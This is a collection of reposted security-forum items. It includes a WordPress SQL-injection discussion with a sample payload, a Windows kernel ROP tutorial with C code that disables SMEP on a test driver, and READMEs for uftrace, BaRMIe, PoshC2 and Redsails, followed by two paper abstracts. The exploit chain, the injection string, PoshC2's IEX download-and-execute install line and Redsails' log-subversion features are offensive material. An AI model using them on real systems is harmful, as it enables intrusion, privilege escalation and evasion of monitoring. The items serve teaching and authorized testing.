(because most of the SQL would actually break when using numbered placeholders without quotes) the usage was as safe as sprintf was. Then along comes a security researcher, discloses a vulnerability in $wpdb->prepare and states that if a developer makes a mistake and types %1$%s instead, then there’s potential for SQL injection. How? %1$%s gets transformed to %1$'%s' by $wpdb->prepare, because one of the features of the method is to unquote instances of "%s" and '%s' and then quote them again. What does sprintf do? %1$' get eaten up as an invalid placeholder, while %s' is left up for grabs and get transformed into whatever we wanted but only with a single quote at the end of it, breaking the SQL. An exploit would need: 1. A developer to make a typo and not notice is in the highlighted syntax of the code editor, 2. the attacker to have access to the input parameters. A hypothetical piece of code would be SELECT * FROM wp_users WHERE user_ID = %1$%s OR user_ID = %2$%s. With both inputs controlled by the attacker we can get the following if argument 1 is “1 OR 1 != ” and argument 2 is “injection”: SELECT * FROM wp_users WHERE user_ID = 1 OR 1 != ' OR user_ID = injection'. Which would simply return true for all users, because 1 is not equal to “OR user_ID = injection”, is it? So think of the chances of such code existing in the wild. Now think of the chances $wpdb->prepare is not used. Probably slim. At least but what we know of the vulnerability and how much has been disclosed. Four weeks later WordPress 4.8.2 enters the scene unexpectedly. And the patch it contains simply prevents anything other than %s, %f and %d from existing. Hell breaks lose. Sites with Yoast SEO installed on them stop functioning in the backend due to some code that relied on numbered placeholders. Needless to say, the aftermath of this decision will be felt for many months to come. 
Generated SQL with numbered placeholders is invalid SQL, a database error is thrown, a 500 error is returned in the browser. They call this “hardening”. A patch to “prevent plugins and themes from accidentally causing a vulnerability”. That’s funny. Why don’t we prevent stray quotes in the query? Or why don’t we prevent calls to $wpdb->query without a preceding call to $wpdb->prepare or unite them into one and break code that does not escape? But I’m very sure the security team have wrecked their heads for weeks and this was the decision that had to be made. Who stood behind the final decision, what was the reasoning, how will the aftermath be dealt with, nobody knows. Us risky developers can only comply. We can only wholeheartedly trust that the countless nights of sleep were lost pondering the better ways of solving the issue. And I’m not going to comment on how a zero-day was out in the public for 4 weeks and how nobody was made aware of the breaking change to $wpdb->preapare. I don’t really care at this point. Policy is policy, whoever got into trouble has already spoken (or will) about how nobody was notified about a used breaking change. It was undocumented, it’s ultimately the fault of who used it. Thus, I can’t call this a regression as developers relied on undocumented functionality. It’s not a a bug either. But wouldn’t it be great if $wpdb->prepare would actually support numbered placeholders? Seeing that it’s been used and will continue to be attempted to be used for years to come, I would say it’s a good idea. Why hasn’t anyone requested this before? Well, because it worked. Now, since it no longer works. A trac ticket requesting the feature is due, so that the community can figure out a way to introduce documented support for these popular numbered placeholders. Part 2: The feature request Meet ticket #41925 the first of a handful of duplicates that wanted numbered placeholders “back”. A discussion (or at least a monologue for now) to see how we can introduce their safe support in $wpdb->prepare, why the security team had to do what they did. I quickly threw a patch together to get the ball rolling as well as some test cases. In less than 12 hours a wontfix/close decision was made by one of the decision makers. Biased by some sort of undisclosed test cases that my patch failed to pass. Biased by what the team tried to do with the vulnerability. Biased by the internal misfortunes and hurdles they were met with while trying to solve it. Biased by the fact that numbered placeholders were not supported to begin with. Just like that. A wontfix/closed stamp. Where’s the discussion? Where’s the test cases that fail? Is it not a valid feature request? We’ve had more absurd ones hang open for years. Why is a valid feature request, all of a sudden stamped in way similar to some of the most silly single-line feature requests out there? Why should a though-through, code-heavy and well-versed (at least in my opinion, but hey, I’m biased) ticket be carrying the stigma of a wontfix/closed? Discouraging people from actively participating in exploring the problem space and finding a solution because one of the higher-ups said “No way, Jose?” A disrespectful spit in the face is what I felt. After spending over 8 hours trying to understand what the issue is, how we can begin to address it? Shut down. Just like that? 
And an hour after the feature request is closed as wontfix Slack has this weekly or monthly (I don’t know) new contributors day, where developers and designers are encouraged to work on issues, etc. Oh, the freaking irony! If this is not hypocrisy, I don’t know what is. Again. It’s a feature request. It’s related to a vulnerability. In order to implement a good solution we have to dissect the vulnerability, there’s no other way, whether you like it or not. We have to write hundreds of test cases, try and break the proposed solutions. But a wontfix/closed? “Why bother?”, would say a passerby. “Oh, but you can still discuss and comment on it. And you can even reopen it.” some would say. After all the “encouragement”? After a core committer does an action that is literally equal to saying “We won’t fix this, no point in trying. Shoo away, go home, kids.” when effort and determination to get things going is clearly shown? Such disregard is pretty offensive and depressing. After speaking to several other people from the Russian community, I’ve been told that this behavior not unheard of. The almighty “No” of the higher ups, just because. The community is sometimes met with hurdles upon hurdles, a contributing environment that sometimes verges on the disgusting. Is this really the WordPress open-source project? Part 3: On safety nets vs. bad code. Sursa: https://codeseekah.com/2017/09/21/on-wordpress-security-and-contributing/
-
Return Oriented Programming Tutorial

Hi, in this tutorial we will go through a very basic way of creating a ROP (Return Oriented Programming) chain in order to bypass SMEP and get kernel-mode execution on the latest Windows installation despite Microsoft's mitigations.

Setup: This tutorial is meant to be an active tutorial, meaning that it is best to download the binary provided for the tutorial and experiment on your own with the main ideas presented. This is what you will need in order to run the full tutorial on your own:
HEVD: download from here.
Windows 10 RS3: here.
WinDbg & Symbols: * kd. Symbols.
Hyper-V: * How to enable Hyper-V.
Set up file sharing between the machine and the host: * Setup File Sharing.
My debug binary: * download link.

Introduction: Return Oriented Programming (in the computer security context) is a technique used to bypass certain defence mechanisms, like DEP (Data Execution Prevention) and SMEP. If you would like to read more about SMEP you can check out the link in the main README.md file of this project. The main characteristic of this method is that instead of running pure shellcode directly from a user-supplied buffer, we instead use small snippets of code called gadgets. Say, for example, I want to place 0x1FA5 in rsp; usually I would simply write in my shellcode: mov rsp, 0x1FA5. Instead, when using ROP, we try to find some address in memory (this can be a DLL, an EXE image or the kernel image) that does exactly the same thing, and instead of writing the instruction in the payload we place the memory address of that code to be executed. So let's say I know that at a certain offset from the base address of some DLL, say hal.dll, there is a good instruction; then, assuming I can get code execution, if I pass the address of that code to the exploit target at runtime it will get executed. When building a ROP chain, the chain will be composed of many small gadgets like this one; you can think of it as shellcoding with snippets from other executable memory. Here is a little snippet to visualize this: so in that picture, as an example, we will send our exploit target a buffer that contains hal+0x6bf0 followed by hal+0x668e, and so on.

You may ask yourself: why would we want to do that? Why not simply write the shellcode as is? Well, if you can simply write the shellcode as is then it is far easier to do that, but as mentioned before it may not always be possible. So let's say a little about SMEP. SMEP is a security measure that uses hardware features in order to protect the endpoint from exploits such as kernel exploits. The main idea is to mark each page allocated in memory as either kernel address space (K-executable/r/w) or user space. This way, when the kernel executes code, the code address is checked (if the hardware offers that capability) to see whether it is a user-space address or a kernel-mode address. If the code is found to be marked as user space, the kernel stops the execution flow with a critical error, a BSOD. So if we simply try to exploit a stack overflow like we did on Windows 7, we will get this outcome: so the main idea in ROP is to make the execution flow go through kernel-executable addresses that pass the check until we can execute our own payload. A minimal sketch of how such a buffer can be laid out follows below. Enough talk, let's debug!!!
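Before firing up the debugger, here is a minimal conceptual sketch of how such an overflow buffer can be laid out. The gadget offsets are the ones used by the chain shown later in this tutorial; the padding size, kernel base and shellcode pointer are placeholders that a real exploit has to obtain at runtime.

#include <stdint.h>
#include <string.h>

/* Fill buf (assumed large enough) with padding followed by the ROP chain,
 * so that the saved return address is overwritten with the first gadget. */
void build_chain(uint8_t *buf, size_t pad, uintptr_t ntos, uintptr_t shellcode)
{
    uintptr_t chain[4];

    chain[0] = ntos + 0x17d970;  /* pop rcx ; ret      (nt!HvlEndSystemInterrupt+0x1e) */
    chain[1] = 0x506f8;          /* value popped into rcx: CR4 with the SMEP bit off   */
    chain[2] = ntos + 0x434a33;  /* mov cr4, rcx ; ret (nt!KiEnableXSave+0x7472)       */
    chain[3] = shellcode;        /* with SMEP off, a user-mode address may now run     */

    memset(buf, 0x90, pad);                 /* filler up to the saved return address   */
    memcpy(buf + pad, chain, sizeof chain); /* overwrite the return address and beyond */
}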
Assuming that you have set up the environment as stated above and you have a working machine, open an administrator command prompt and type as follows: before running anything, hit break on the debugger (open the debug window and click Break), then open View -> Registers. Scroll all the way down and the result should be: next up, type g and hit Enter; the machine should be running as normal. Run the sample exe that I have provided; you should get a breakpoint and this output should appear in the debugger: as you can see, this breakpoint is different from the one we hit before. First take a look at the address that triggered the breakpoint. At the breakpoint before we hit:

0xfffff80391595050 cc int 3

and now we got:

Break instruction exception - code 0x80000003 (first chance)
0x0000017039f00046 cc int 3

As you can see, the first address is a kernel-space address and the second a user address. This is because I have placed 0xcc in my shellcode. Next, open the registers again; the outcome should be as follows: you may ask yourself, why has the cr4 register changed, and why do we not get the BSOD message as before? Because the binary builds a ROP chain as follows:

// To better align the buffer,
// it is useful to declare a
// memory structure, otherwise you will get holes
// in the buffer and end up with an access violation.
typedef struct _RopChain {
    PUCHAR HvlEndSystemInterrupt;
    PUCHAR Var;
    PUCHAR KiEnableXSave;
    PUCHAR payload;
    // PUCHAR deviceCallBack;
} ROPCHAIN, *PROPCHAIN;

// Pack the buffer as:
ROPCHAIN Chain;

// nt!HvlEndSystemInterrupt+0x1e --> Pop Rcx; Retn;
Chain.HvlEndSystemInterrupt = Ntos + 0x17d970;

// kd> r cr4
// ...1506f8
Chain.Var = (PUCHAR)0x506f8;

// nt!KiEnableXSave+0x7472 --> Mov Cr4, Rcx; Retn;
Chain.KiEnableXSave = Ntos + 0x434a33;

This means that we have sent the vulnerable driver a stack overflow buffer, but instead of supplying our shellcode we have given the driver the buffer above, which is composed of:

Pop Rcx      <-- kernel-mode address
Retn
0x506f8
Mov Cr4, Rcx
Retn
(ShellCodeAddress)

So basically we have "jumped" to our shellcode from other kernel-mode addresses, so we did not get the BSOD, simply because we gave the kernel a kernel-mode address and passed the check; then we flipped the bit in the cr4 register value to trick the system into thinking SMEP is not supported by the firmware. We can see that by running the kv command: you can see the kernel-mode addresses in the call stack and follow the execution flow, as well as the NOPs we placed in our buffer. Hit g again and you should see the outcome below: as you can see we have hit an access violation. This is because in this demo I did not fix the return address pointer, so we can do this together. Hit r on the debugger: as you can see the stack is a mess and so are the registers; the code at the return address tries to read a pointer from rax, which points to address zero, so we got an access violation. So just like we had to "jump" to our shellcode to avoid SMEP, we now need to jump back to a reasonable state. But how can we know what is a good address to jump back to? When we looked at the stack before, we could see the execution flow: 0x00007fffb29013aa, the lowest address, called the ioctl, and then we got to our shellcode from the overflow (the NOPs). A good thing to do would be to return to one of our original calls on the stack to resume execution.
If we take a look at 0x00007fffb29013aa we can see it is marked as UREV (user executable), so if we jump to that address we will be in the same situation as before (BSOD); we need to find another place on the stack to jump to. Let's look at nt!IofCallDriver+0x59, which is on the stack as well; we can even see what code is at this location by running the command below: we can see that this function simply returns back to the caller and is also KREV (kernel executable), so it will be a good choice. While I was finding gadgets I was doing exactly the same thing: looking for KREV addresses that contain code useful to me, like mov cr4, rcx, using the 'u' command in kd. OK, but how can we jump to that address? Open up the registers again and copy the first instruction address from the output of kd> u nt!IofCallDriver+0x59, as follows: place it in rip (in View -> Registers...) and now hit g again. Back in the box you should have a command prompt running as Local System. So this is the end of the tutorial; I hope it will be useful. Now you know a bit more about ROP and have some basic tools to build your own ROP chain. My example code can be found here: C0de. And I challenge you to fix the return address programmatically! For more information please go to the main readme of this project and follow the links provided (how to find gadgets, ROP, SMEP, etc.). Sursa: https://github.com/akayn/demos/tree/master/Tutorials
-
- 1
-
-
uftrace The uftrace tool is to trace and analyze execution of a program written in C/C++. It was heavily inspired by the ftrace framework of the Linux kernel (especially function graph tracer) and supports userspace programs. It supports various kind of commands and filters to help analysis of the program execution and performance. Homepage: https://github.com/namhyung/uftrace Tutorial: https://github.com/namhyung/uftrace/wiki/Tutorial Chat: https://gitter.im/uftrace/uftrace Features It traces each function in the executable and shows time duration. It can also trace external library calls - but only entry and exit are supported and cannot trace internal function calls in the library call unless the library itself built with profiling enabled. It can show detailed execution flow at function level, and report which function has the highest overhead. And it also shows various information related the execution environment. You can setup filters to exclude or include specific functions when tracing. In addition, it can save and show function arguments and return value. It supports multi-process and/or multi-threaded applications. With root privilege, it can also trace kernel functions as well( with -k option) if the system enables the function graph tracer in the kernel (CONFIG_FUNCTION_GRAPH_TRACER=y). How to use uftrace The uftrace command has following subcommands: record : runs a program and saves the trace data replay : shows program execution in the trace data report : shows performance statistics in the trace data live : does record and replay in a row (default) info : shows system and program info in the trace data dump : shows low-level trace data recv : saves the trace data from network graph : shows function call graph in the trace data script : runs a script for recorded trace data You can use -? or --help option to see available commands and options. $ uftrace Usage: uftrace [OPTION...] [record|replay|live|report|info|dump|recv|graph|script] [<program>] Try `uftrace --help' or `uftrace --usage' for more information. If omitted, it defaults to the live command which is almost same as running record and replay subcommand in a row (but does not record the trace info to files). For recording, the executable should be compiled with -pg (or -finstrument-functions) option which generates profiling code (calling mcount or __cyg_profile_func_enter/exit) for each function. $ uftrace tests/t-abc # DURATION TID FUNCTION 16.134 us [ 1892] | __monstartup(); 223.736 us [ 1892] | __cxa_atexit(); [ 1892] | main() { [ 1892] | a() { [ 1892] | b() { [ 1892] | c() { 2.579 us [ 1892] | getpid(); 3.739 us [ 1892] | } /* c */ 4.376 us [ 1892] | } /* b */ 4.962 us [ 1892] | } /* a */ 5.769 us [ 1892] | } /* main */ For more analysis, you'd be better recording it first so that it can run analysis commands like replay, report, graph, dump and/or info multiple times. $ uftrace record tests/t-abc It'll create uftrace.data directory that contains trace data files. Other analysis commands expect the directory exists in the current directory, but one can use another using -d option. The replay command shows execution information like above. As you can see, the t-abc is a very simple program merely calls a, b and c functions. In the c function it called getpid() which is a library function implemented in the C library (glibc) on normal systems - the same goes to __cxa_atexit(). Users can use various filter options to limit functions it records/prints. 
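The source of that hello program is not shown in the README; a minimal guess at it (the only assumption is the fprintf-to-stderr detail mentioned above) and a build line using the -pg instrumentation described earlier would be:

/* hello.c -- build with:  gcc -pg -o hello hello.c  */
#include <stdio.h>

int main(void)
{
    /* fprintf to stderr so the write syscall shows up directly in the trace */
    fprintf(stderr, "Hello world\n");
    return 0;
}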
The depth filter (-D option) is to omit functions under the given call depth. The time filter (-t option) is to omit functions running less than the given time. And the function filters (-F and -N options) are to show/hide functions under the given function. The -k option enables to trace kernel functions as well (needs root access). With the classic hello world program, the output would look like below (Note, I changed it to use fprintf() with stderr rather than the plain printf() to make it invoke system call directly): $ sudo uftrace -k hello Hello world # DURATION TID FUNCTION 1.365 us [21901] | __monstartup(); 0.951 us [21901] | __cxa_atexit(); [21901] | main() { [21901] | fprintf() { 3.569 us [21901] | __do_page_fault(); 10.127 us [21901] | sys_write(); 20.103 us [21901] | } /* fprintf */ 21.286 us [21901] | } /* main */ You can see the page fault handler and the write syscall handler were called inside the fprintf() call. Also it can record and show function arguments and return value with -A and -R options respectively. The following example records first argument and return value of 'fib' (fibonacci number) function. $ uftrace record -A fib@arg1 -R fib@retval fibonacci 5 $ uftrace replay # DURATION TID FUNCTION 2.853 us [22080] | __monstartup(); 2.194 us [22080] | __cxa_atexit(); [22080] | main() { 2.706 us [22080] | atoi(); [22080] | fib(5) { [22080] | fib(4) { [22080] | fib(3) { 7.473 us [22080] | fib(2) = 1; 0.419 us [22080] | fib(1) = 1; 11.452 us [22080] | } = 2; /* fib */ 0.460 us [22080] | fib(2) = 1; 13.823 us [22080] | } = 3; /* fib */ [22080] | fib(3) { 0.424 us [22080] | fib(2) = 1; 0.437 us [22080] | fib(1) = 1; 2.860 us [22080] | } = 2; /* fib */ 19.600 us [22080] | } = 5; /* fib */ 25.024 us [22080] | } /* main */ The report command lets you know which function spends the longest time including its children (total time). $ uftrace report Total time Self time Calls Function ========== ========== ========== ==================================== 25.024 us 2.718 us 1 main 19.600 us 19.600 us 9 fib 2.853 us 2.853 us 1 __monstartup 2.706 us 2.706 us 1 atoi 2.194 us 2.194 us 1 __cxa_atexit The graph command shows function call graph of given function. In the above example, function graph of function 'main' looks like below: $ uftrace graph main # # function graph for 'main' (session: 8823ea321c31e531) # backtrace ================================ backtrace #0: hit 1, time 25.024 us [0] main (0x40066b) calling functions ================================ 25.024 us : (1) main 2.706 us : +-(1) atoi : | 19.600 us : +-(1) fib 16.683 us : (2) fib 12.773 us : (4) fib 7.892 us : (2) fib The dump command shows raw output of each trace record. You can see the result in the chrome browser, once the data is processed with uftrace dump --chrome. Below is a trace of clang (LLVM) compiling a small C++ template metaprogram. The info command shows system and program information when recorded. 
$ uftrace info # system information # ================== # program version : uftrace v0.6 # recorded on : Tue May 24 11:21:59 2016 # cmdline : uftrace record tests/t-abc # cpu info : Intel(R) Core(TM) i7-3930K CPU @ 3.20GHz # number of cpus : 12 / 12 (online / possible) # memory info : 20.1 / 23.5 GB (free / total) # system load : 0.00 / 0.06 / 0.06 (1 / 5 / 15 min) # kernel version : Linux 4.5.4-1-ARCH # hostname : sejong # distro : "Arch Linux" # # process information # =================== # number of tasks : 1 # task list : 5098 # exe image : /home/namhyung/project/uftrace/tests/t-abc # build id : a3c50d25f7dd98dab68e94ef0f215edb06e98434 # exit status : exited with code: 0 # elapsed time : 0.003219479 sec # cpu time : 0.000 / 0.003 sec (sys / user) # context switch : 1 / 1 (voluntary / involuntary) # max rss : 3072 KB # page fault : 0 / 172 (major / minor) # disk iops : 0 / 24 (read / write) How to install uftrace The uftrace is written in C and tried to minimize external dependencies. Currently it requires libelf in elfutils package to build, and there're some more optional dependencies. Once you installed required software(s) on your system, it can be built and installed like following: $ make $ sudo make install For more advanced setup, please refer INSTALL.md file. Limitations It can trace a native C/C++ application on Linux. It cannot trace already running process. It cannot be used for system-wide tracing. It supports x86_64 and ARM (v6 or later) and AArch64 for now. License The uftrace program is released under GPL v2. See COPYING file for details. Sursa: https://github.com/namhyung/uftrace
-
- 1
-
-
BaRMIe BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services. RMI services often expose dangerous functionality without adequate security controls, however RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools which disappeared soon after, however even with those tools a successful zero-knowledge attack relies on a significant brute force attack (~64-bits/9 quintillion possibilities) being performed over the network. The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64-bits over the network. Download version 1.0 built and ready to run here: https://github.com/NickstaDB/BaRMIe/releases/download/v1.0/BaRMIe_v1.0.jar Disclaimer BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program. Usage Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information. $ java -jar BaRMIe.jar ▄▄▄▄ ▄▄▄ ██▀███ ███▄ ▄███▓ ██▓▓█████ ▓█████▄ ▒████▄ ▓██ ▒ ██▒▓██▒▀█▀ ██▒▓██▒▓█ ▀ ▒██▒ ▄██▒██ ▀█▄ ▓██ ░▄█ ▒▓██ ▓██░▒██▒▒███ ▒██░█▀ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ ▒██ ░██░▒▓█ ▄ ░▓█ ▀█▓ ▓█ ▓██▒░██▓ ▒██▒▒██▒ ░██▒░██░░▒████▒ ░▒▓███▀▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░ ▒░ ░ ░░▓ ░░ ▒░ ░ ▒░▒ ░ ▒ ▒▒ ░ ░▒ ░ ▒░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ v1.0 Java RMI enumeration tool. Written by Nicky Bloor (@NickstaDB) Warning: BaRMIe was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program. Usage: BaRMIe -enum [options] [host] [port] Enumerate RMI services on the given endpoint(s). Note: if -enum is not specified, this is the default mode. BaRMIe -attack [options] [host] [port] Enumerate and attack the given target(s). Options: --threads The number of threads to use for enumeration (default 10). --timeout The timeout for blocking socket operations (default 5,000ms). --targets A file containing targets to scan. The file should contain a single host or space-separated host and port pair per line. Alternatively, all nmap output formats are supported, BaRMIe will parse nmap output for port 1099, 'rmiregistry', or 'Java RMI' services to target. Note: [host] [port] not supported when --targets is used. Reliability: A +/- system is used to indicate attack reliability as follows: [+ ]: Indicates an application-specific attack [- ]: Indicates a JRE attack [ + ]: Attack insecure methods (such as 'writeFile' without auth) [ - ]: Attack Java deserialization (i.e. 
Object parameters) [ +]: Does not require non-default dependencies [ -]: Non-default dependencies are required Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint. Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services. A single target can be specified on the command line. Alternatively BaRMIe can extract targets from a simple text file or nmap output. No Vulnerable Targets Identified? Great! This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI so contributions will go a long way in improving BaRMIe and the security of RMI services. If you have access to JAR files or source code for the target application then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively look for remote methods that accept arbitrary objects or otherwise non-primitive parameters as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future. Alternatively, get in touch, and provide as much detail as possible including BaRMIe -enum output and ideally the relevant JAR files. Attack Types BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door. 1. Attacking Insecure Methods The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this: //Get a reference to the remote RMI registry service Registry reg = LocateRegistry.getRegistry(targetHost, targetPort); //Get a reference to the target RMI object Foo bar = (Foo)reg.lookup(objectName); //Call the remote executeCommand() method bar.executeCommand(cmd); 2. Deserialization via Object-type Paraeters Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter then the method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below: public void setOption(String name, Object value); public void addAll(List values); 3. Deserialization via Illegal Method Invocation Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. 
Some examples of vulnerable methods can be seen below: public void setName(String name); public Long add(Integer i1, Integer i2); public void sum(int[] values); The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them. Sursa: https://github.com/NickstaDB/BaRMIe
-
PoshC2 PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework. Find us on #Slack - poshc2.slack.com Requires only Powershell v2 on both server and client C2 Server Implant Handler Quick Install powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')" Team Server Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler Wiki: For more info see the GitHub Wiki Welcome to the PoshC2 wiki page Sursa: https://github.com/nettitude/PoshC2
-
Abstract—With the rise of attacks using PowerShell in the recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5, however this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques implemented for PowerShell attacks for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, which is explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis. Download: https://arxiv.org/pdf/1709.07508.pdf
-
Redsails About A post-exploitation tool capable of: maintaining persistence on a compromised machine subverting many common host event logs (both network and account logon) generating false logs / network traffic Based on [PyDivert] (https://github.com/ffalcinelli/pydivert), a Python binding for WinDivert, a Windows driver that allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. Built for Windows operating systems newer than Vista and Windows 2008 (including Windows 7, Windows 8 and Windows 10). Dependencies Redsails has dependencies PyDivert and WinDivert. You can resolve those dependencies by running: pip install pydivert pip install pbkdf2 Pycrypto is also needed. easy_install pycrypto Pycrypto may have a dependency on [Microsoft Visual C++ Compiler for Python 2.7] (http://aka.ms/vcpython27) Usage Server (victim host you are attacking) redSails.py Or if the victim does not have python installed, you can run provided exe (or compile your own! instructions below) `redSails.exe Client (attacker) redSailsClient.py <ip> <port> Creating an executable To compile an exe (for deployment) inlieu of the python script, you will need pyinstaller: pip install pyinstaller Then you can create the exe: pyinstaller-script.py -F --clean redSails.spec License Copyright (C) 2017 Robert J. McDown, Joshua Theimer This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/. Sursa: https://github.com/BeetleChunks/redsails
-
Abstract—Developing an approach to test cryptographic hash function implementations can be particularly difficult, and bugs can remain unnoticed for a very long time. We revisit the NIST SHA-3 hash function competition, and apply a new testing strategy to all available reference implementations. Motivated by the cryptographic properties that a hash function should satisfy, we develop four types of tests. The Bit-Contribution Test checks if changes in the message affect the hash value, and the Bit-Exclusion Test checks that changes beyond the last bit of the message leave the hash value unchanged. We develop the Metamorphic Update Test to verify that messages are processed correctly in chunks, and then use combinatorial testing methods to reduce the test set size by several orders of magnitude while retaining the same fault detection capability. Our tests detect bugs in 41 of the 86 reference implementations submitted to the SHA-3 competition, including the rediscovery of a bug in all submitted implementations of the SHA-3 finalist BLAKE. This bug remained undiscovered for seven years, and is particularly serious because it provides a simple strategy to modify the message without changing the hash value that is returned by the implementation. We will explain how to detect this type of bug, using a simple and fully-automated testing approach. Download: https://eprint.iacr.org/2017/891.pdf
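As an illustration of the Bit-Contribution Test described in the abstract, here is a minimal sketch (not from the paper): it flips every message bit and requires the digest to change, using a deliberately broken toy hash, not one of the SHA-3 candidates, so the test has something to catch.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DIGEST_LEN 8

/* Toy hash with a planted bug: the final message byte never influences the output. */
static void toy_hash(const uint8_t *msg, size_t len, uint8_t out[DIGEST_LEN])
{
    uint64_t h = 0x12345678abcdef01ULL;
    for (size_t i = 0; i + 1 < len; i++)          /* bug: skips msg[len - 1] */
        h = (h ^ msg[i]) * 0x100000001b3ULL;
    memcpy(out, &h, DIGEST_LEN);
}

/* Bit-Contribution Test: every flipped message bit must change the digest. */
static int bit_contribution_test(uint8_t *msg, size_t len)
{
    uint8_t ref[DIGEST_LEN], cur[DIGEST_LEN];
    int ok = 1;

    toy_hash(msg, len, ref);
    for (size_t i = 0; i < len * 8; i++) {
        msg[i / 8] ^= (uint8_t)(1u << (i % 8));   /* flip bit i           */
        toy_hash(msg, len, cur);
        msg[i / 8] ^= (uint8_t)(1u << (i % 8));   /* restore the message  */
        if (memcmp(ref, cur, DIGEST_LEN) == 0) {
            printf("bit %zu of the message does not affect the digest\n", i);
            ok = 0;
        }
    }
    return ok;
}

int main(void)
{
    uint8_t msg[4] = { 'a', 'b', 'c', 'd' };
    return bit_contribution_test(msg, sizeof msg) ? 0 : 1;
}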